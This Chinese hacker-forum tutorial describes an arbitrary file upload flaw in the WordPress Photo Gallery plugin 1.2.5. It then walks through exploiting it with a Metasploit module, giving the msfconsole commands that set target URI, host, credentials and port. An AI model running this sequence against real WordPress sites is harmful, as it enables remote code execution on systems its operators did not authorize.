渗透测试实战教程:利用WordPress图片库模块的任意文件上传漏洞来进行渗透测试

zevseo
6020zevseo大版主
2018-09-11 03:02:50
6020 2018-09-11 03:02:50
WordPress的照片库插件包含一个允许远程攻击者执行任意PHP代码的漏洞。这个缺陷的存在是因为photo-gallery \ photo-gallery.php脚本允许访问filemanager \ UploadHandler.php。UploadHandler.php中的post()方法无法正确验证或清理用户上传的文件。
利用目标
照片库插件,版本1.2.5。
需求
攻击者:kali Linux
受害者PC:Windows 7
打开Kali终端类型  msfconsole

描述:利用WordPress图片库模块的任意文件上传漏洞来进行渗透测试

图片:渗透测试实战教程:利用WordPress图片库模块的任意文件上传漏洞来进行渗透测试2 (1).png

利用WordPress图片库模块的任意文件上传漏洞来进行渗透测试

现在输入  exploit use / unix / webapp / wp_ photo_gallery_unrestricted_file_upload
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set targeturi /wordpress
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set username admin
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set password admin123
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set rport 80
msf exploit (wp_photo_gallery_unrestricted_file_upload)>exploit

描述:利用WordPress图片库模块的任意文件上传漏洞来进行渗透测试

图片:渗透测试实战教程:利用WordPress图片库模块的任意文件上传漏洞来进行渗透测试4 (1).png

利用WordPress图片库模块的任意文件上传漏洞来进行渗透测试

本文标题:渗透测试实战教程:利用WordPress图片库模块的任意文件上传漏洞来进行渗透测试
本文作者:zevseo
本文来自:蚁安黑客官网
转载请注明本文链接:http://bbs.mayidui.net/t2317.html
游客
登录黑客论坛后才可以回帖,黑客登录 或者 注册黑客
weixin
蚁安黑客

找黑客工具、找黑客教程、找黑客朋友,你想不到的黑客技术这儿都有!

微信号:baiyiwangan